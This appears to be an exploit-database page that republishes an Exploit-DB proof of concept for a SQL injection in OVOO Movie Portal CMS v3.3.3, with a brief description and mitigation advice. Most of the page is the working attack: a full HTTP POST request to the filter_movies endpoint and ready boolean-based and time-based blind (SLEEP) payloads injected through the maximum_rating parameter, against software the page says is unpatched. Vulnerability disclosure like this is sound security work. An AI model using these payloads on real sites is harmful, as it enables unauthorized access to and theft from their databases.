header-logo
Suggest Exploit
vendor:
OVOO Movie Portal CMS
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: OVOO Movie Portal CMS
Affected Version From: 3.3.2003
Affected Version To: 3.3.2003
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, MacOS
2023

OVOO Movie Portal CMS v3.3.3 – SQL Injection

This exploit allows an attacker to perform SQL injection on OVOO Movie Portal CMS v3.3.3. The vulnerability exists in the 'maximum_rating' parameter of the 'filter_movies' endpoint, allowing an attacker to manipulate the SQL query and potentially gain unauthorized access to the database.

Mitigation:

The vendor should release a patch to sanitize user input and prevent SQL injection attacks. In the meantime, users can mitigate the risk by ensuring that the application is running on a secure environment and implementing proper input validation and sanitization.
Source

Exploit-DB raw data:

# Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
POST /filter_movies/1 HTTP/2
Host: localhost
Cookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495us
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/movies.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: htts://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1

### Parameter & Payloads ###
Parameter: maximum_rating (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND
2238=2238&page=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT
4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

Navigation

Suggest Exploit

Services By CQR